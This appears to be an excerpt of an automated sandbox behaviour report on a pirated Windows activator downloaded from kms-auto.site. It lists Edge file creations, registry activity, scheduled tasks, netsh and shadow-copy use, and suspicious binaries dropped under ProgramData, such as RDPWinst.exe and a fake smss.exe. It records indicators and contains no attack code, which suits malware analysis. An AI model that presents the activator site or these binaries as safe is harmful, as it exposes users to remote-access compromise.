| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\edge_driver.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-ec\cs\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\fr-CA\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification_fast.bundle.js.LICENSE.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Tokenized-Card\tokenized-card.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-webui-708.de49febeeb0e9c77883f.chunk.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\ar\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\cs\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_700750315\deny_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\de\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\es\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-mn-cyrl.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-DE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\it\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\ar\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\fr-CA\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\fr\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\wallet\wallet-checkout\merchant-site-info.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-de-1996.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\runtime.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_1498492656\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-bg.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\product_page.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\hu\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\pt-BR\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-FR | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_2024013401\sets.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_1972247359\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\wallet\wallet-notification-config.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.html | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_checkout_page_validator.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\bnpl\bnpl.html | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\sv\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\el\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping468_693472959\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_700750315\deny_etld1_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-sl.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\crypto.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\de\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\zh-Hans\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Setup\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Setup\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\RDPWinst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\KMS Tools Lite Portable\GSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Microsoft\win.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Setup\smss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Setup\smss.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895695533523394" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\ProgramData\Setup\smss.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{6D6688C3-7945-484D-B534-F54B959BC780} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{B2EED048-F807-45D8-9CDA-850EE2E93D88} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database | C:\ProgramData\Setup\smss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\ProgramData\Setup\smss.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\ProgramData\Setup\winmgmts:\ | C:\ProgramData\Setup\IP.exe | N/A |
| File opened for modification | C:\ProgramData\Setup\WinMgmts:\ | C:\ProgramData\Setup\IP.exe | N/A |
| File opened for modification | C:\ProgramData\Setup\winmgmts:\ | C:\ProgramData\Setup\smss.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\KMS Tools Lite Portable\GSetup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\unsecapp.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\KMS Tools Lite Portable\GSetup.exe | N/A |
| N/A | N/A | C:\KMS Tools Lite Portable\GSetup.exe | N/A |
| N/A | N/A | C:\KMS Tools Lite Portable\GSetup.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://kms-auto.site/windows-10-activator/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x300,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2272,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2408,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3476,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5092,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5072,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4800,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5900 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5224,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5168,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=4812,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5880,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6584,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5964,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6316,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6052,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5948 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
